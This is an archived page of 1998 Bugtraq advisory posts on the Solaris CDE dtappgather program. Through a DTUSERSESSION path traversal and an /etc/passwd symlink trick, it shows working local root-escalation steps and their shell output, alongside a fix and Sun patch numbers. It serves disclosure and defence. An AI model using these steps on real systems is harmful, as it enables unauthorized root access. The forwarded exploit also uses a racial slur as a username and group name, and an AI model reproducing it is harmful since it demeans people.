TUCoPS :: SunOS/Solaris :: dtap2.txt

Another /usr/bin/dt/dtappgather feature! (Solaris/SunOS) 


From costan@amb1.amb.polimi.it Mon Nov  2 08:12:39 1998
Date: Mon, 2 Nov 1998 18:05:59 +0100 (MET)
From: Andrea Costantino <costan@amb1.amb.polimi.it>
To: BUGTRAQ@netspace.org, news@rootshell.com
Subject: another /usr/dt/bin/dtappgather feature!

There's attached the message related to this new feature..
the /usr/dt/bin/dtappgather program tries to read the enviroment variable
$DTUSERSESSION to get the name of the file to seek for.
The file is searched in /var/dt/appconfig/appmanager.
Under SunOS 5.5,5.5.1 (aka Solaris 2.5, 2.5.1) that directory is 777 or
01777 so you're able to make a simbolic link to the file you wish, but on
SunOS 5.6 (Solaris 2.6) the directory is 755 to avoid this.
Unfortunately the dtappgather never check the $DTUSERSESSION variable, so
you can use the syntax ../../.. etc... to grab the file you wish, even if
you can't write the /var/dt/appconfig/appmanager directory....

For example

costan@penelope$ ls -ald /var/dt/appconfig/appmanager
drwxr-xr-x   9 bin      bin           512 Oct 30 11:27 /var/dt/appconfig/appmanager

costan@penelope$ export $DTUSERSESSION=../../../../etc/passwd
costan@penelope$ /usr/dt/bin/dtappgather
[.... stuff ....]
costan@penelope$ ls -al /etc/passwd
-r-xr-xr-x   1 costan     users           531 Oct  9 14:08 /etc/passwd

This way you're satisfied even without making strange link on strange path
(the name in CDE are very difficult to remember ;-) )

Best Wishes, admins...
Andrea Costantino (aka k0stan)
Network Manager at DIIAR
Politecnico di Milano






Attached message:
[ http://www.rootshell.com/ ]

Date:         Mon, 23 Feb 1998 15:31:16 +0200
From:         Mastoras <mastoras@PAPARI.HACK.GR>
Subject:      /usr/dt/bin/dtappgather exploit

Buggy program:
        /usr/dt/bin/dtappgather

Description of the problem:
        Local users can change the ownership of any file, thus gaining
root priviledges. This happens because "dtappgather" does not check if the
file /var/dt/appconfig/appmanager/generic-display-0 is a symbolic link and
happily chown()s it to the user. When CERT released advisory CA-98.02
about /usr/dt/bin/dtappgather, I played a little with dtappgather and
discovered the problem above, but I thought that patch 104498-02 corrects it,
as described in SUN's section of 98.02. When I applied the patch, I
realised that it was still possible to gain root privs.

Systems Affected:
        *At least* SunOS 5.5 & 5.5.1 running CDE version 1.0.2 with suid
bit on /usr/dt/bin/dtappgather. SunOS 5.6 (or CDE 1.2) comes with
directory /var/dt/appconfig/appmanager/ mode 755 so it's not possible to
make the necessary link. On the other hand, in SunOS 5.5* this dir has
mode 777, so you can easily make the link or even unlink/rename the file
"generic-display-0" if exists owned by another user.

Quick Fix:
        chmod -s /usr/dt/bin/dtappgather

The Exploit:
        The forwarded exploit was initially posted to hack.gr's security
mailing list: "haxor".


Hack wisely,
Mastoras

        /*
         *  Computer Engineering & Informatics Department, Patras, Greece
         *  Mastor Wins, Fatality!      http://www.hack.gr/users/mastoras
         */

---------- Forwarded message ----------
Date: Sat, 24 Jan 1998 02:48:13 +0200 (EET)
From: Mastoras <mastoras@papari.hack.gr>
Reply-To: haxor@hack.gr
To: haxor@papari.hack.gr, Undisclosed recipients:  ;
Subject: [HAXOR:11] dtappgather exploit

Hello,

        I suppose you have learnt about CERT's advisory on dtappgather
program. Well, here's the exploit:

nigg0r@host% ls -l /etc/passwd
-r--r--r--   1 root     other        1585 Dec 17 22:26 /etc/passwd
nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
nigg0r@host% dtappgather
MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists
nigg0r@host% ls -l /etc/passwd
-r-xr-xr-x   1 nigg0r   niggers      1585 Dec 17 22:26 /etc/passwd
nigg0r@host% echo "nigg0r wins! Fatality!" | mail root

        it would be easy to find the exploit if you had read CERT's advisory.
the following steps were enough..

% cp /usr/dt/bin/dtappgather .          [you can't "truss" suid proggies]
% truss -o koko ./dtappgather
% more koko
[ shity ld things ]
chown("/var/dt/appconfig/appmanager/generic-display-0", 666, 666) = 0
chmod("/var/dt/appconfig/appmanager/generic-display-0", 0555) = 0
[ shitty things ]

        I hope this was not too lame or well-known :-)


Seeya,
mastoras

--------------------------------------------------------------------------

Steven Goldberg - SE - Seattle WA (steven.goldberg@West.Sun.COM)

Hi,

Sun has published the following patches to address this
vulnerability:

patches  104497    CDE 1.0.1: dtappgather patch
patches  104498    CDE 1.0.2: dtappgather patch
patches  104499    CDE 1.0.1_x86: dtappgather patch
patches  104500    CDE 1.0.2_x86: dtappgather patch
patches  105837    CDE 1.2: dtappgather Patch
patches  105838    CDE 1.2_x86: dtappgather Patch


thanks,

Steve

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH